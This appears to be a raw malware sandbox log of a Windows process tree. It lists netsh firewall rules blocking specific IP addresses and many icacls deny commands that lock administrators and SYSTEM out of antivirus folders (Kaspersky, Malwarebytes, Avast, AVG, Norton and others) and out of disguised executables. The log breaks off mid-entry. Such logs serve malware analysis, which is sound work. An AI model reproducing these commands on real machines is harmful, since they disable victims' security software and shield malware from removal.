C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96

PID:4708

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96

PID:5232

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96

PID:4924

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96

PID:5136

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81

PID:5168

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81

PID:5296

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81

PID:5180

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81

PID:5308

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22

PID:5332

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22

PID:5464

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22

PID:5356

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22

PID:5456

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186

PID:5496

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186

PID:5624

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186

PID:5508

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186

PID:5612

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169

PID:5652

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169

PID:5800

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169

PID:5676

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169

PID:5808

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11

PID:5848

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11

PID:5956

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11

PID:5860

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11

PID:5964

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236

PID:6004

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236

PID:6120

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236

PID:6016

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236

PID:6128

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61

PID:4844

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61

PID:4868

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61

PID:4884

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61

PID:4136

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102

PID:4984

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102

PID:1012

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102

PID:4248

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102

PID:4124

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151

PID:4752

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151

PID:5856

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151

PID:4496

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151

PID:5608

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26

PID:5868

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26

PID:3872

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26

PID:4536

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26

PID:4504

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230

PID:4456

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230

PID:5228

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230

PID:5420

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230

PID:5340

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)

PID:5336

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)

PID:5512

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)

PID:5428

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)

PID:5664

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)

PID:4864

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)

PID:5840

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)

PID:2844

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5824

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)

PID:5532

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)

PID:5988

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)

PID:5704

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)

PID:5916

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)

PID:5288

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)

PID:5864

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)

PID:5908

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)

PID:6096

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)

PID:4256

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)

Modifies file permissions

PID:6136

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)

PID:4252

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:4620

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

PID:4268

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

PID:5044

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)

PID:4904

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\java.exe /deny Администраторы:(F)

Modifies file permissions

PID:5500

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)

PID:3844

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\java.exe /deny System:(F)

PID:6080

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)

PID:5172

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\java.exe /deny система:(F)

PID:3712

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)

PID:6112

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5680

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

PID:4424

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

PID:5912

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)

PID:4484

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5812

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)

PID:4172

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)

Modifies file permissions

PID:5768

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)

PID:2620

C:\Windows\SysWOW64\icacls.exe

icacls c:\windows\svchost.exe /deny Администраторы:(F)

PID:5656

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)

PID:4532

C:\Windows\SysWOW64\icacls.exe

icacls c:\windows\svchost.exe /deny System:(F)

Modifies file permissions

PID:5996

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)

PID:2732

C:\Windows\SysWOW64\icacls.exe

icacls c:\windows\svchost.exe /deny система:(F)

Modifies file permissions

PID:5328

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)

PID:5760

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5968

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

PID:5708

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

PID:5344

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)

PID:5920

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:6020

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

PID:4740

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

Modifies file permissions

PID:5216

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)

PID:5952

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)

PID:3924

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

PID:348

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

Modifies file permissions

PID:4508

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)

PID:6108

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)

PID:5556

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)

PID:5716

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)

Modifies file permissions

PID:5816

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)

PID:5208

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:2132

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

PID:388

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

PID:1596

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)

PID:5176

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\lsass.exe /deny Администраторы:(F)

PID:5156

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)

PID:4544

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\lsass.exe /deny System:(F)

Modifies file permissions

PID:2832

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)

PID:4644

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\kz.exe /deny Администраторы:(F)

Modifies file permissions

PID:5904

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)

PID:5580

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\kz.exe /deny System:(F)

Modifies file permissions

PID:6060

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)

PID:5692

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\script.exe /deny Администраторы:(F)

Modifies file permissions

PID:5584

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)

PID:4812

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\script.exe /deny System:(F)

Modifies file permissions

PID:5668

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)

PID:4768

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny Администраторы:(F)

Modifies file permissions

PID:5396

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

PID:4460

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

PID:5220

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)

PID:5568

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny Администраторы:(F)

Modifies file permissions

PID:5140

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

PID:4888

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

PID:5560

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)

PID:5364

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\olly.exe /deny Администраторы:(F)

PID:4876

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)

PID:4792

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\olly.exe /deny System:(F)

PID:6124

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)

PID:5244

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)

PID:5960

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)

PID:4628

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\lsass2.exe /deny System:(F)

Modifies file permissions

PID:3824

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)

PID:5312

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\boy.exe /deny Администраторы:(F)

PID:5184

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)

PID:5008

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\boy.exe /deny System:(F)

Modifies file permissions

PID:1312

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)

PID:2100

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)

PID:4300

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

PID:4724

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

PID:504

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)

PID:4640

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5544

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)

PID:4560

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)

PID:5764

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)

PID:5012

C:\Windows\SysWOW64\icacls.exe

icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:2860

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)

PID:5888

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)

PID:5740

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)

PID:5928

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5832

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

PID:5424

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

Modifies file permissions

PID:2356

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)

PID:4388

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)

PID:5280

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)

PID:5640

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)

PID:2276

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)

PID:4488

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:2176

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)

PID:6032

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5148

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)

PID:5732

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)

PID:4412

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)

PID:5372

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5188

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)

PID:6012

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)

PID:4764

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)

PID:4384

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:4336

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)

PID:5124

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5796

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)

PID:4432

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)

PID:4972

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)

PID:3584

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:1560

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)

PID:4956

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5520

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)

PID:4436

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5736

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

PID:5776

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5588

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

PID:5392

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

PID:5828

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)

PID:5536

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:6064

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

PID:5444

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

Modifies file permissions

PID:6024

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

PID:4500

